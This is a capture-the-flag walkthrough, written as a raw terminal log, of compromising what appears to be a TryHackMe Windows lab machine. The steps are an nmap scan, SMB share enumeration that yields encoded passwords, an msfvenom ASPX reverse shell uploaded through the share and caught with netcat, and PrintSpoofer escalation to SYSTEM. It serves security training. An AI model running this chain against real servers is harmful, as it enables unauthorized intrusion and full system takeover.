
██████╗ ███████╗██╗     ███████╗██╗   ██╗ █████╗ ███╗   ██╗████████╗
██╔══██╗██╔════╝██║     ██╔════╝██║   ██║██╔══██╗████╗  ██║╚══██╔══╝
██████╔╝█████╗  ██║     █████╗  ██║   ██║███████║██╔██╗ ██║   ██║   
██╔══██╗██╔══╝  ██║     ██╔══╝  ╚██╗ ██╔╝██╔══██║██║╚██╗██║   ██║   
██║  ██║███████╗███████╗███████╗ ╚████╔╝ ██║  ██║██║ ╚████║   ██║  


KALI@RAT:~# nano /etc/hosts
relevant.try   10.10.218.183

Penetration Testing Methodology
Reconnaissance

01>>=================================Nmap=======================================
nmap -A -p-  relevant.try -o relevant.txt_all

Nmap scan report for relevant.try (10.10.218.183)
Host is up (0.11s latency).
Not shown: 65527 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2020-11-11T20:14:25+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
|_ssl-date: 2020-11-11T20:15:04+00:00; -4s from scanner time.
49663/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h35m57s, deviation: 3h34m41s, median: -3s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-11T12:14:24-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-11T20:14:26
|_  start_date: 2020-11-11T19:58:02

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   89.40 ms  10.8.0.1
2   110.11 ms relevant.try (10.10.218.183)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 693.59 seconds

02>>===============================Enumeration==================================

================================Smbclient===================================

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# smbclient -L relevant.try
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
SMB1 disabled -- no workgroup available
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# smbclient //relevant.try/nt4wrksv
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 25 17:46:04 2020
  ..                                  D        0  Sat Jul 25 17:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

                7735807 blocks of size 4096. 4944154 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# ls
passwords.txt
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# cat passwords.txt 
[User Passwords - Encoded]
Qm9********JCRXMHJEITEyMw==
Qmls*************40MjA2OTY5NjkhJCQk

https://gchq.github.io/CyberChef/

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# echo -n "Qm9iIC0******MHJEITEyMw==" | base64 -d;echo""
Bob - !P@*******!123
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# echo -n "QmlsbCAtIEp1dz**********************JCQk" | base64 -d;echo""
Bill - Juw4nnaM4********969!$$$

=================================Smbmap=====================================

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb#smbclient //relevant.try/nt4wrksv -u bob -p
Try "help" to get a list of possible commands.
smb: \> put shell.aspx 
putting file shell.aspx as \shell.aspx (11.3 kb/s) (average 11.3 kb/s)
smb: \>

03>>================================Exploiting==================================

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.112.39 LPORT=1337 -f aspx -o shell.aspx

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb#curl http://relevant.try:49663/nt4wrksv/shell.aspx


KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# rlwrap nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.8.112.39] from (UNKNOWN) [10.10.218.183] 49960
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

cd c:\Users\Bob\Desktop
dir
type user.txt

================================Privilege Escalation========================

c:\Users\Bob\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\Users\Bob\Desktop>

=======Abuse of permission in SeImpersonatePrivilege in the system.=========

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# git clone https://github.com/dievus/printspoofer.git
Cloning into 'printspoofer'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (6/6), 11.92 KiB | 2.98 MiB/s, done.
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# cd printspoofer/
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb/printspoofer# ls
PrintSpoofer.exe  README.md
KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb/printspoofer# mv PrintSpoofer.exe ../

KALI@RAT:~/Documents/TRY_HACK_ME/Relevant/smb# smbclient //relevant.try/nt4wrksv -u bob -p
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer.exe 
putting file PrintSpoofer.exe as \PrintSpoofer.exe (16.8 kb/s) (average 11.1 kb/s)
smb: \>

c:\Users>cd C:\inetpub\wwwroot\nt4wrksv
cd C:\inetpub\wwwroot\nt4wrksv

C:\inetpub\wwwroot\nt4wrksv>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\inetpub\wwwroot\nt4wrksv

11/12/2020  08:22 AM    <DIR>          .
11/12/2020  08:22 AM    <DIR>          ..
07/25/2020  07:15 AM                98 passwords.txt
11/12/2020  08:22 AM            27,136 PrintSpoofer.exe
11/12/2020  08:16 AM             3,395 shell1.aspx
               3 File(s)         30,629 bytes
               2 Dir(s)  20,207,005,696 bytes free

C:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Administrator\Desktop

07/25/2020  07:24 AM    <DIR>          .
07/25/2020  07:24 AM    <DIR>          ..
07/25/2020  07:25 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,207,120,384 bytes free

04>>=================================Capture the flag===========================

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469de***************5pv}
C:\Users\Administrator\Desktop>
